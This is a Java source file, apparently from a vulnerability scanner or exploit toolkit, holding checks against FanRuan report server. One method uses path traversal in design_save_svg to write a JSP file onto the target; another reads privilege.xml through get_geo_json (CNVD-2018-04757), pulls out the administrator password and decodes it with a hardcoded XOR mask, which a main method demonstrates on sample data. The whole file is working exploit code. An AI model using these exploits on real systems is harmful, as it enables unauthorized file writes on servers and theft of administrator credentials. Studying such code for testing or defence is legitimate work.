package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

import java.net.MalformedURLException;

@BasicMapping(uri = "帆软OA")
public class fineReportController extends Controller implements BasicController{

    @VulnerabilityDescriptionMapping(Description = "帆软报表 V9 design_save_svg 任意文件覆盖文件上传",SupportVulType = SupportVul.UploadFile)
    public void vul_design_save_svg(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  帆软报表 V9 design_save_svg 任意文件覆盖文件上传");
        String url = "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp";
        String data = "{\"__CONTENT__\":\"<%out.println(\\\"Hello World!\\\");%>\",\"__CHARSET__\":\"UTF-8\"}";
        switch (type){
            case EXP:
                new HttpRequest(target+url).Post(data);

                HttpRequest httpRequest2_exp = new HttpRequest(target+url);
                Response result2_exp = httpRequest2_exp.Get("");
                if(result2_exp.responseBody.contains("Hello World") && result2_exp.statusCode==200){
                    WriteExpLog("\n[*] 存在漏洞");
                }else {
                    WriteExpLog("\n[*] 不存在漏洞");
                }
                WriteExpLog("\n"+result2_exp.responseBody);
                break;
            case POC:
                new HttpRequest(target+url).Post(data);

                HttpRequest httpRequest2 = new HttpRequest(target+"/update.jsp");
                Response result2 = httpRequest2.Get("");
                if(result2.responseBody.contains("Hello World") && result2.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                WriteLog("\n[*]"+result2.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757",SupportVulType = SupportVul.信息泄露)
    public void vul_get_geo_json(Poc_Exp type, String target, Object... args) throws MalformedURLException{
        WriteLog("\n开始检测：  帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757");
        String url = "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml";
        switch (type){
            case EXP:

                break;
            case POC:
                Response result2 = new HttpRequest(target+url).Get("");
                if(result2.responseBody.contains("rootManagerName") && result2.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    String passwordEncode = result2.responseBody.split("<rootManagerPassword>")[1].split("</rootManagerPassword>")[0];
                    passwordEncode = passwordEncode.split("<!\\[CDATA\\[")[1].split("]]")[0];
                    passwordEncode = passwordEncode.trim();
                    WriteLog("[&] 密码: "+passwordDecode(passwordEncode));
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                WriteLog("\n"+result2.responseBody);
        }
    }
    public static String passwordDecode(String var0) {
        int[] PASSWORD_MASK_ARRAY = new int[] {19, 78, 10, 15, 100, 213, 43, 23}; //#掩码
        if (var0 != null && var0.startsWith("___")) {
            var0 = var0.substring(3);
            StringBuilder var1 = new StringBuilder();
            int var2 = 0;

            for(int var3 = 0; var3 <= var0.length() - 4; var3 += 4) {
                if (var2 == PASSWORD_MASK_ARRAY.length) {
                    var2 = 0;
                }

                String var4 = var0.substring(var3, var3 + 4);
                int var5 = Integer.parseInt(var4, 16) ^ PASSWORD_MASK_ARRAY[var2];
                var1.append((char)var5);
                ++var2;
            }

            var0 = var1.toString();
        }

        return var0;
    }

    public static void main(String[] args) {
        String data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<PrivilegeManager xmlVersion=\"20170715\" releaseVersion=\"8.0.0\" fsSystemManagerPassSet=\"true\" birthday=\"0\" male=\"false\">\n" +
                "<rootManagerName>\n" +
                "<![CDATA[admin]]></rootManagerName>\n" +
                "<rootManagerPassword>\n" +
                "<![CDATA[___00520017004e002b004100b7004200250023007f003d003d005400e4001c0057]]></rootManagerPassword>\n" +
                "<AP class=\"com.fr.privilege.providers.NoAuthenticationProvider\"/>\n" +
                "<ForwardUrl>\n" +
                "<![CDATA[${servletURL}?op=fr_platform]]></ForwardUrl>\n" +
                "<PVFILTER class=\"com.fr.fs.privilege.auth.BasePrivilegeFilter\"/>\n" +
                "</PrivilegeManager>";
        String passwordEncode = data.split("<rootManagerPassword>")[1].split("</rootManagerPassword>")[0];
        passwordEncode = passwordEncode.split("<!\\[CDATA\\[")[1].split("]]")[0];
        System.out.println(passwordDecode(passwordEncode));
    }
}
